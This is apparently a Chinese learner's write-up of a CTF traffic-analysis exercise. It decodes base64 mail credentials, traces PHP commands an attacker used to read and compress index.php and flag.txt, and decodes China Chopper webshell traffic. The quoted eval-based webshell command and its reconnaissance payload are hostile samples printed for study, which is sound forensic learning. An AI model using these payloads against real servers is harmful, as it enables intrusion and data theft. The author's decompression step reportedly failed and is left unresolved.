最近在学习流量分析这块的内容,找到一篇不错的文章,就准备复盘一下。
原文链接:https://www.freebuf.com/column/169738.html
问题一
打开这个流量包,大致分析一下是一个邮箱请求登陆的一个流量包,一眼就看见了 user和pass,需要base64解密一下即可。
base64解密地址:https://base64.supfree.net/
username:test@51elab.com
password:FLAG:ISCCTESTpas
flag就藏在password里
问题二
随意的追踪一个tcp流就发现了flag,可是这是我一直不太明白的,拿到一个流量包,如何判断追踪那个流呢?
问题三
切换至http进行查看
发现大量数据爆破,猜想是黑客进行扫描
浏览之后,发现最后存在可疑操作
黑阔执行phpinfo成功
于是开始执行下面两句话:
print_r(gzcompress(file_get_contents(base64_decode(%22aW5kZXgucGhw%22))));
print_r(gzcompress(file_get_contents(base64_decode(%22ZmxhZy50eHQ%22))));
将上面两句话中进行操作的文件进行base64解密
注意:%22 是 双引号的url编码,要去掉之后再解码,才可以得到正确的文件名
index.php
flag.txt
我们切换至原始数据,提取flag.txt的gz压缩二进制内容
这里我卡了好久,不过最终还是整明白了,找到了flag.txt的gz压缩二进制内容,这里多亏了这个文章:
https://blog.csdn.net/chrycoder/article/details/86525316
看了这个文章大致就明白了,我就简单截个图说一说就好了
我的理解:
黑阔在这里把flag.txt中的内容进行读取,并进行gz压缩
然后我们可以确定压缩的ascii内容如下
切换到原始数据,发现下面全变成了二进制代码,于是要去找那个gz压缩的二进制代码到底是哪个,这时就用到了010Editor
点击save as 为1.tar.gz,再用010Editor打开,对照右边的内容去确定二进制到底要选那一段,最终确定如下:
得到flag.txt的gz压缩二进制内容
789ccbc82c492e49abb6304d32484c354eb4483437b048b234324f4a334c343648494b334e36333531a8e5020018cb0c6c
保存成文件
然后写脚本进行解压缩
php
<?php
$a = gzuncompress(file_get_contents('./1'));
echo $a;
?>
按照这个脚本我并没有搞成功,尝试对字符串直接压缩也不可以,无奈,先跳过块了,说不定之后会找到症结所在。。
问题四
同样,我们先查看http流量
发现有人不断向/uploads/dvwa.php提交post数据
怀疑这里存在一句话木马,于是追踪tcp流
发现端倪,这里有个cmd,url解码
也就是:
cmd=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw==
对z0进行base64解码,如下:
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D}\t";
if(substr($D,0,1)!="/")
{
foreach(range("A","Z") as $L)
if(is_dir("{$L}:"))
$R.="{$L}:";
}
$R.="\t";
$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';
$usr=($u)?$u['name']:@get_current_user();
$R.=php_uname();
$R.="({$usr})";
print $R;;
echo("|<-");
die();
发现大多都是中国菜刀的流量,遍历查看所有黑客操作,
使用tcp.stream eq x
x代表一个数字
在tcp stream 5和6发现了猫腻
tcp.stream eq 5